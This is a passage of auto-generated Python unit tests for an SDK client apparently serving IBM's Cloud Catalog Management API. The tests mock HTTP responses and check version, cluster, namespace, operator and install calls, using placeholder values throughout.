        mock_response = '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "name": "name", "offering_icon_url": "offering_icon_url", "offering_docs_url": "offering_docs_url", "offering_support_url": "offering_support_url", "tags": ["tags"], "keywords": ["keywords"], "rating": {"one_star_count": 14, "two_star_count": 14, "three_star_count": 16, "four_star_count": 15}, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "long_description": "long_description", "features": [{"title": "title", "description": "description"}], "kinds": [{"id": "id", "format_kind": "format_kind", "target_kind": "target_kind", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "install_description": "install_description", "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "versions": [{"id": "id", "_rev": "rev", "crn": "crn", "version": "version", "sha": "sha", "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "offering_id": "offering_id", "catalog_id": "catalog_id", "kind_id": "kind_id", "tags": ["tags"], "repo_url": "repo_url", "source_url": "source_url", "tgz_url": "tgz_url", "configuration": [{"key": "key", "type": "type", "default_value": {"anyKey": "anyValue"}, "value_constraint": "value_constraint", "description": "description", "required": true, "options": [{"anyKey": "anyValue"}], "hidden": true}], "metadata": {"mapKey": {"anyKey": "anyValue"}}, "validation": {"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "single_instance": false, "install": {"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}, "pre_install": [{"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}], "entitlement": {"provider_name": "provider_name", "provider_id": "provider_id", "product_id": "product_id", "part_numbers": ["part_numbers"], "image_repo_name": "image_repo_name"}, "licenses": [{"id": "id", "name": "name", "type": "type", "url": "url", "description": "description"}], "image_manifest_url": "image_manifest_url", "deprecated": true, "package_version": "package_version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "version_locator": "version_locator", "console_url": "console_url", "long_description": "long_description", "whitelisted_accounts": ["whitelisted_accounts"]}], "plans": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "deployments": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z"}]}]}], "permit_request_ibm_public_publish": false, "ibm_publish_approved": true, "public_publish_approved": false, "public_original_crn": "public_original_crn", "publish_public_crn": "publish_public_crn", "portal_approval_record": "portal_approval_record", "portal_ui_url": "portal_ui_url", "catalog_id": "catalog_id", "catalog_name": "catalog_name", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "disclaimer": "disclaimer", "hidden": true, "provider": "provider", "repo_info": {"token": "token", "type": "type"}}'
        responses.add(responses.GET,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        version_loc_id = 'testString'

        # Invoke method
        response = _service.get_version(
            version_loc_id,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

    @responses.activate
    def test_get_version_value_error(self):
        """
        test_get_version_value_error()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/versions/testString')
        mock_response = '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "name": "name", "offering_icon_url": "offering_icon_url", "offering_docs_url": "offering_docs_url", "offering_support_url": "offering_support_url", "tags": ["tags"], "keywords": ["keywords"], "rating": {"one_star_count": 14, "two_star_count": 14, "three_star_count": 16, "four_star_count": 15}, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "long_description": "long_description", "features": [{"title": "title", "description": "description"}], "kinds": [{"id": "id", "format_kind": "format_kind", "target_kind": "target_kind", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "install_description": "install_description", "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "versions": [{"id": "id", "_rev": "rev", "crn": "crn", "version": "version", "sha": "sha", "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "offering_id": "offering_id", "catalog_id": "catalog_id", "kind_id": "kind_id", "tags": ["tags"], "repo_url": "repo_url", "source_url": "source_url", "tgz_url": "tgz_url", "configuration": [{"key": "key", "type": "type", "default_value": {"anyKey": "anyValue"}, "value_constraint": "value_constraint", "description": "description", "required": true, "options": [{"anyKey": "anyValue"}], "hidden": true}], "metadata": {"mapKey": {"anyKey": "anyValue"}}, "validation": {"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "single_instance": false, "install": {"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}, "pre_install": [{"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}], "entitlement": {"provider_name": "provider_name", "provider_id": "provider_id", "product_id": "product_id", "part_numbers": ["part_numbers"], "image_repo_name": "image_repo_name"}, "licenses": [{"id": "id", "name": "name", "type": "type", "url": "url", "description": "description"}], "image_manifest_url": "image_manifest_url", "deprecated": true, "package_version": "package_version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "version_locator": "version_locator", "console_url": "console_url", "long_description": "long_description", "whitelisted_accounts": ["whitelisted_accounts"]}], "plans": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "deployments": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z"}]}]}], "permit_request_ibm_public_publish": false, "ibm_publish_approved": true, "public_publish_approved": false, "public_original_crn": "public_original_crn", "publish_public_crn": "publish_public_crn", "portal_approval_record": "portal_approval_record", "portal_ui_url": "portal_ui_url", "catalog_id": "catalog_id", "catalog_name": "catalog_name", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "disclaimer": "disclaimer", "hidden": true, "provider": "provider", "repo_info": {"token": "token", "type": "type"}}'
        responses.add(responses.GET,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        version_loc_id = 'testString'

        # Pass in all but one required param and check for a ValueError
        req_param_dict = {
            "version_loc_id": version_loc_id,
        }
        for param in req_param_dict.keys():
            # Compare param names with equality, not identity ('is'):
            # string identity is an implementation detail and must not be
            # relied on for correctness.
            req_copy = {key: val if key != param else None for (key, val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.get_version(**req_copy)
class TestDeleteVersion():
    """
    Test Class for delete_version
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.

        A URL ending in one or more slashes is turned into a regex so the
        mock matches regardless of trailing-slash normalization.
        """
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_delete_version_all_params(self):
        """
        delete_version()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/versions/testString')
        responses.add(responses.DELETE,
                      url,
                      status=200)

        # Set up parameter values
        version_loc_id = 'testString'

        # Invoke method
        response = _service.delete_version(
            version_loc_id,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

    @responses.activate
    def test_delete_version_value_error(self):
        """
        test_delete_version_value_error()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/versions/testString')
        responses.add(responses.DELETE,
                      url,
                      status=200)

        # Set up parameter values
        version_loc_id = 'testString'

        # Pass in all but one required param and check for a ValueError
        req_param_dict = {
            "version_loc_id": version_loc_id,
        }
        for param in req_param_dict.keys():
            # Compare param names with equality, not identity ('is'):
            # string identity is an implementation detail and must not be
            # relied on for correctness.
            req_copy = {key: val if key != param else None for (key, val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.delete_version(**req_copy)
# endregion
##############################################################################
# End of Service: Versions
##############################################################################
##############################################################################
# Start of Service: Deploy
##############################################################################
# region
class TestGetCluster():
    """
    Test Class for get_cluster
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.

        A URL ending in one or more slashes is turned into a regex so the
        mock matches regardless of trailing-slash normalization.
        """
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_get_cluster_all_params(self):
        """
        get_cluster()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/deploy/kubernetes/clusters/testString')
        mock_response = '{"resource_group_id": "resource_group_id", "resource_group_name": "resource_group_name", "id": "id", "name": "name", "region": "region"}'
        responses.add(responses.GET,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        cluster_id = 'testString'
        region = 'testString'
        x_auth_refresh_token = 'testString'

        # Invoke method
        response = _service.get_cluster(
            cluster_id,
            region,
            x_auth_refresh_token,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

        # Validate query params
        query_string = responses.calls[0].request.url.split('?',1)[1]
        query_string = urllib.parse.unquote_plus(query_string)
        assert 'region={}'.format(region) in query_string

    @responses.activate
    def test_get_cluster_value_error(self):
        """
        test_get_cluster_value_error()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/deploy/kubernetes/clusters/testString')
        mock_response = '{"resource_group_id": "resource_group_id", "resource_group_name": "resource_group_name", "id": "id", "name": "name", "region": "region"}'
        responses.add(responses.GET,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        cluster_id = 'testString'
        region = 'testString'
        x_auth_refresh_token = 'testString'

        # Pass in all but one required param and check for a ValueError
        req_param_dict = {
            "cluster_id": cluster_id,
            "region": region,
            "x_auth_refresh_token": x_auth_refresh_token,
        }
        for param in req_param_dict.keys():
            # Compare param names with equality, not identity ('is'):
            # string identity is an implementation detail and must not be
            # relied on for correctness.
            req_copy = {key: val if key != param else None for (key, val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.get_cluster(**req_copy)
class TestGetNamespaces():
    """
    Test Class for get_namespaces
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.
        """
        # A URL ending in one or more slashes is registered as a regex so the
        # mock still matches; any other URL is used verbatim.
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_get_namespaces_all_params(self):
        """
        get_namespaces() with all optional parameters (limit, offset) supplied.
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/deploy/kubernetes/clusters/testString/namespaces')
        mock_response = '{"offset": 6, "limit": 5, "total_count": 11, "resource_count": 14, "first": "first", "last": "last", "prev": "prev", "next": "next", "resources": ["resources"]}'
        responses.add(responses.GET,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        cluster_id = 'testString'
        region = 'testString'
        x_auth_refresh_token = 'testString'
        limit = 1000
        offset = 38

        # Invoke method
        response = _service.get_namespaces(
            cluster_id,
            region,
            x_auth_refresh_token,
            limit=limit,
            offset=offset,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

        # Validate query params
        query_string = responses.calls[0].request.url.split('?', 1)[1]
        query_string = urllib.parse.unquote_plus(query_string)
        assert 'region={}'.format(region) in query_string
        assert 'limit={}'.format(limit) in query_string
        assert 'offset={}'.format(offset) in query_string

    @responses.activate
    def test_get_namespaces_required_params(self):
        """
        get_namespaces() with only the required parameters supplied.
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/deploy/kubernetes/clusters/testString/namespaces')
        mock_response = '{"offset": 6, "limit": 5, "total_count": 11, "resource_count": 14, "first": "first", "last": "last", "prev": "prev", "next": "next", "resources": ["resources"]}'
        responses.add(responses.GET,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        cluster_id = 'testString'
        region = 'testString'
        x_auth_refresh_token = 'testString'

        # Invoke method
        response = _service.get_namespaces(
            cluster_id,
            region,
            x_auth_refresh_token,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

        # Validate query params
        query_string = responses.calls[0].request.url.split('?', 1)[1]
        query_string = urllib.parse.unquote_plus(query_string)
        assert 'region={}'.format(region) in query_string

    @responses.activate
    def test_get_namespaces_value_error(self):
        """
        Verify that get_namespaces() raises a ValueError when any one of its
        required parameters is None.
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/deploy/kubernetes/clusters/testString/namespaces')
        mock_response = '{"offset": 6, "limit": 5, "total_count": 11, "resource_count": 14, "first": "first", "last": "last", "prev": "prev", "next": "next", "resources": ["resources"]}'
        responses.add(responses.GET,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        cluster_id = 'testString'
        region = 'testString'
        x_auth_refresh_token = 'testString'

        # Pass in all but one required param and check for a ValueError
        req_param_dict = {
            "cluster_id": cluster_id,
            "region": region,
            "x_auth_refresh_token": x_auth_refresh_token,
        }
        for param in req_param_dict.keys():
            # Compare keys with != (value equality), not the identity
            # operator `is not`, which only worked via string interning.
            req_copy = {key: val if key != param else None for (key, val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.get_namespaces(**req_copy)
class TestDeployOperators():
    """
    Test Class for deploy_operators
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.
        """
        # A URL ending in one or more slashes is registered as a regex so the
        # mock still matches; any other URL is used verbatim.
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_deploy_operators_all_params(self):
        """
        deploy_operators() with every optional body parameter supplied;
        validates the serialized request body.
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/deploy/kubernetes/olm/operator')
        mock_response = '[{"phase": "phase", "message": "message", "link": "link", "name": "name", "version": "version", "namespace": "namespace", "package_name": "package_name", "catalog_id": "catalog_id"}]'
        responses.add(responses.POST,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        x_auth_refresh_token = 'testString'
        cluster_id = 'testString'
        region = 'testString'
        namespaces = ['testString']
        all_namespaces = True
        version_locator_id = 'testString'

        # Invoke method
        response = _service.deploy_operators(
            x_auth_refresh_token,
            cluster_id=cluster_id,
            region=region,
            namespaces=namespaces,
            all_namespaces=all_namespaces,
            version_locator_id=version_locator_id,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

        # Validate body params
        req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
        assert req_body['cluster_id'] == 'testString'
        assert req_body['region'] == 'testString'
        assert req_body['namespaces'] == ['testString']
        assert req_body['all_namespaces'] is True
        assert req_body['version_locator_id'] == 'testString'

    @responses.activate
    def test_deploy_operators_required_params(self):
        """
        deploy_operators() with only the required x_auth_refresh_token.
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/deploy/kubernetes/olm/operator')
        mock_response = '[{"phase": "phase", "message": "message", "link": "link", "name": "name", "version": "version", "namespace": "namespace", "package_name": "package_name", "catalog_id": "catalog_id"}]'
        responses.add(responses.POST,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        x_auth_refresh_token = 'testString'

        # Invoke method
        response = _service.deploy_operators(
            x_auth_refresh_token,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

    @responses.activate
    def test_deploy_operators_value_error(self):
        """
        Verify that deploy_operators() raises a ValueError when the required
        x_auth_refresh_token parameter is None.
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/deploy/kubernetes/olm/operator')
        mock_response = '[{"phase": "phase", "message": "message", "link": "link", "name": "name", "version": "version", "namespace": "namespace", "package_name": "package_name", "catalog_id": "catalog_id"}]'
        responses.add(responses.POST,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        x_auth_refresh_token = 'testString'

        # Pass in all but one required param and check for a ValueError
        req_param_dict = {
            "x_auth_refresh_token": x_auth_refresh_token,
        }
        for param in req_param_dict.keys():
            # Compare keys with != (value equality), not the identity
            # operator `is not`, which only worked via string interning.
            req_copy = {key: val if key != param else None for (key, val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.deploy_operators(**req_copy)
class TestListOperators():
    """
    Test Class for list_operators
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.
        """
        # A URL ending in one or more slashes is registered as a regex so the
        # mock still matches; any other URL is used verbatim.
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_list_operators_all_params(self):
        """
        list_operators() with all parameters; validates the query string.
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/deploy/kubernetes/olm/operator')
        mock_response = '[{"phase": "phase", "message": "message", "link": "link", "name": "name", "version": "version", "namespace": "namespace", "package_name": "package_name", "catalog_id": "catalog_id"}]'
        responses.add(responses.GET,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        x_auth_refresh_token = 'testString'
        cluster_id = 'testString'
        region = 'testString'
        version_locator_id = 'testString'

        # Invoke method
        response = _service.list_operators(
            x_auth_refresh_token,
            cluster_id,
            region,
            version_locator_id,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

        # Validate query params
        query_string = responses.calls[0].request.url.split('?', 1)[1]
        query_string = urllib.parse.unquote_plus(query_string)
        assert 'cluster_id={}'.format(cluster_id) in query_string
        assert 'region={}'.format(region) in query_string
        assert 'version_locator_id={}'.format(version_locator_id) in query_string

    @responses.activate
    def test_list_operators_value_error(self):
        """
        Verify that list_operators() raises a ValueError when any one of its
        required parameters is None.
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/deploy/kubernetes/olm/operator')
        mock_response = '[{"phase": "phase", "message": "message", "link": "link", "name": "name", "version": "version", "namespace": "namespace", "package_name": "package_name", "catalog_id": "catalog_id"}]'
        responses.add(responses.GET,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        x_auth_refresh_token = 'testString'
        cluster_id = 'testString'
        region = 'testString'
        version_locator_id = 'testString'

        # Pass in all but one required param and check for a ValueError
        req_param_dict = {
            "x_auth_refresh_token": x_auth_refresh_token,
            "cluster_id": cluster_id,
            "region": region,
            "version_locator_id": version_locator_id,
        }
        for param in req_param_dict.keys():
            # Compare keys with != (value equality), not the identity
            # operator `is not`, which only worked via string interning.
            req_copy = {key: val if key != param else None for (key, val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.list_operators(**req_copy)
class TestReplaceOperators():
    """
    Test Class for replace_operators
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.
        """
        # A URL ending in one or more slashes is registered as a regex so the
        # mock still matches; any other URL is used verbatim.
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_replace_operators_all_params(self):
        """
        replace_operators() with every optional body parameter supplied;
        validates the serialized request body.
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/deploy/kubernetes/olm/operator')
        mock_response = '[{"phase": "phase", "message": "message", "link": "link", "name": "name", "version": "version", "namespace": "namespace", "package_name": "package_name", "catalog_id": "catalog_id"}]'
        responses.add(responses.PUT,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        x_auth_refresh_token = 'testString'
        cluster_id = 'testString'
        region = 'testString'
        namespaces = ['testString']
        all_namespaces = True
        version_locator_id = 'testString'

        # Invoke method
        response = _service.replace_operators(
            x_auth_refresh_token,
            cluster_id=cluster_id,
            region=region,
            namespaces=namespaces,
            all_namespaces=all_namespaces,
            version_locator_id=version_locator_id,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

        # Validate body params
        req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
        assert req_body['cluster_id'] == 'testString'
        assert req_body['region'] == 'testString'
        assert req_body['namespaces'] == ['testString']
        assert req_body['all_namespaces'] is True
        assert req_body['version_locator_id'] == 'testString'

    @responses.activate
    def test_replace_operators_required_params(self):
        """
        replace_operators() with only the required x_auth_refresh_token.
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/deploy/kubernetes/olm/operator')
        mock_response = '[{"phase": "phase", "message": "message", "link": "link", "name": "name", "version": "version", "namespace": "namespace", "package_name": "package_name", "catalog_id": "catalog_id"}]'
        responses.add(responses.PUT,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        x_auth_refresh_token = 'testString'

        # Invoke method
        response = _service.replace_operators(
            x_auth_refresh_token,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

    @responses.activate
    def test_replace_operators_value_error(self):
        """
        Verify that replace_operators() raises a ValueError when the required
        x_auth_refresh_token parameter is None.
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/deploy/kubernetes/olm/operator')
        mock_response = '[{"phase": "phase", "message": "message", "link": "link", "name": "name", "version": "version", "namespace": "namespace", "package_name": "package_name", "catalog_id": "catalog_id"}]'
        responses.add(responses.PUT,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        x_auth_refresh_token = 'testString'

        # Pass in all but one required param and check for a ValueError
        req_param_dict = {
            "x_auth_refresh_token": x_auth_refresh_token,
        }
        for param in req_param_dict.keys():
            # Compare keys with != (value equality), not the identity
            # operator `is not`, which only worked via string interning.
            req_copy = {key: val if key != param else None for (key, val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.replace_operators(**req_copy)
class TestDeleteOperators():
    """
    Test Class for delete_operators
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.
        """
        # A URL ending in one or more slashes is registered as a regex so the
        # mock still matches; any other URL is used verbatim.
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_delete_operators_all_params(self):
        """
        delete_operators() with all parameters; validates the query string.
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/deploy/kubernetes/olm/operator')
        responses.add(responses.DELETE,
                      url,
                      status=200)

        # Set up parameter values
        x_auth_refresh_token = 'testString'
        cluster_id = 'testString'
        region = 'testString'
        version_locator_id = 'testString'

        # Invoke method
        response = _service.delete_operators(
            x_auth_refresh_token,
            cluster_id,
            region,
            version_locator_id,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

        # Validate query params
        query_string = responses.calls[0].request.url.split('?', 1)[1]
        query_string = urllib.parse.unquote_plus(query_string)
        assert 'cluster_id={}'.format(cluster_id) in query_string
        assert 'region={}'.format(region) in query_string
        assert 'version_locator_id={}'.format(version_locator_id) in query_string

    @responses.activate
    def test_delete_operators_value_error(self):
        """
        Verify that delete_operators() raises a ValueError when any one of
        its required parameters is None.
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/deploy/kubernetes/olm/operator')
        responses.add(responses.DELETE,
                      url,
                      status=200)

        # Set up parameter values
        x_auth_refresh_token = 'testString'
        cluster_id = 'testString'
        region = 'testString'
        version_locator_id = 'testString'

        # Pass in all but one required param and check for a ValueError
        req_param_dict = {
            "x_auth_refresh_token": x_auth_refresh_token,
            "cluster_id": cluster_id,
            "region": region,
            "version_locator_id": version_locator_id,
        }
        for param in req_param_dict.keys():
            # Compare keys with != (value equality), not the identity
            # operator `is not`, which only worked via string interning.
            req_copy = {key: val if key != param else None for (key, val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.delete_operators(**req_copy)
class TestInstallVersion():
    """
    Test Class for install_version
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.
        """
        # A URL ending in one or more slashes is registered as a regex so the
        # mock still matches; any other URL is used verbatim.
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_install_version_all_params(self):
        """
        install_version() with every optional body parameter supplied;
        validates the serialized request body.
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/versions/testString/install')
        responses.add(responses.POST,
                      url,
                      status=202)

        # Construct a dict representation of a DeployRequestBodySchematics model
        deploy_request_body_schematics_model = {}
        deploy_request_body_schematics_model['name'] = 'testString'
        deploy_request_body_schematics_model['description'] = 'testString'
        deploy_request_body_schematics_model['tags'] = ['testString']
        deploy_request_body_schematics_model['resource_group_id'] = 'testString'

        # Set up parameter values
        version_loc_id = 'testString'
        x_auth_refresh_token = 'testString'
        cluster_id = 'testString'
        region = 'testString'
        namespace = 'testString'
        override_values = {}
        entitlement_apikey = 'testString'
        schematics = deploy_request_body_schematics_model
        script = 'testString'
        script_id = 'testString'
        version_locator_id = 'testString'
        vcenter_id = 'testString'
        vcenter_user = 'testString'
        vcenter_password = 'testString'
        vcenter_location = 'testString'
        vcenter_datastore = 'testString'

        # Invoke method
        response = _service.install_version(
            version_loc_id,
            x_auth_refresh_token,
            cluster_id=cluster_id,
            region=region,
            namespace=namespace,
            override_values=override_values,
            entitlement_apikey=entitlement_apikey,
            schematics=schematics,
            script=script,
            script_id=script_id,
            version_locator_id=version_locator_id,
            vcenter_id=vcenter_id,
            vcenter_user=vcenter_user,
            vcenter_password=vcenter_password,
            vcenter_location=vcenter_location,
            vcenter_datastore=vcenter_datastore,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 202

        # Validate body params
        req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
        assert req_body['cluster_id'] == 'testString'
        assert req_body['region'] == 'testString'
        assert req_body['namespace'] == 'testString'
        assert req_body['override_values'] == {}
        assert req_body['entitlement_apikey'] == 'testString'
        assert req_body['schematics'] == deploy_request_body_schematics_model
        assert req_body['script'] == 'testString'
        assert req_body['script_id'] == 'testString'
        assert req_body['version_locator_id'] == 'testString'
        assert req_body['vcenter_id'] == 'testString'
        assert req_body['vcenter_user'] == 'testString'
        assert req_body['vcenter_password'] == 'testString'
        assert req_body['vcenter_location'] == 'testString'
        assert req_body['vcenter_datastore'] == 'testString'

    @responses.activate
    def test_install_version_required_params(self):
        """
        install_version() with only the required parameters.
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/versions/testString/install')
        responses.add(responses.POST,
                      url,
                      status=202)

        # Set up parameter values
        version_loc_id = 'testString'
        x_auth_refresh_token = 'testString'

        # Invoke method
        response = _service.install_version(
            version_loc_id,
            x_auth_refresh_token,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 202

    @responses.activate
    def test_install_version_value_error(self):
        """
        Verify that install_version() raises a ValueError when any one of its
        required parameters is None.
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/versions/testString/install')
        responses.add(responses.POST,
                      url,
                      status=202)

        # Set up parameter values
        version_loc_id = 'testString'
        x_auth_refresh_token = 'testString'

        # Pass in all but one required param and check for a ValueError
        req_param_dict = {
            "version_loc_id": version_loc_id,
            "x_auth_refresh_token": x_auth_refresh_token,
        }
        for param in req_param_dict.keys():
            # Compare keys with != (value equality), not the identity
            # operator `is not`, which only worked via string interning.
            req_copy = {key: val if key != param else None for (key, val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.install_version(**req_copy)
class TestPreinstallVersion():
    """
    Test Class for preinstall_version
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.
        """
        # A URL ending in one or more slashes is registered as a regex so the
        # mock still matches; any other URL is used verbatim.
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_preinstall_version_all_params(self):
        """
        preinstall_version() with every optional body parameter supplied;
        validates the serialized request body.
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/versions/testString/preinstall')
        responses.add(responses.POST,
                      url,
                      status=202)

        # Construct a dict representation of a DeployRequestBodySchematics model
        deploy_request_body_schematics_model = {}
        deploy_request_body_schematics_model['name'] = 'testString'
        deploy_request_body_schematics_model['description'] = 'testString'
        deploy_request_body_schematics_model['tags'] = ['testString']
        deploy_request_body_schematics_model['resource_group_id'] = 'testString'

        # Set up parameter values
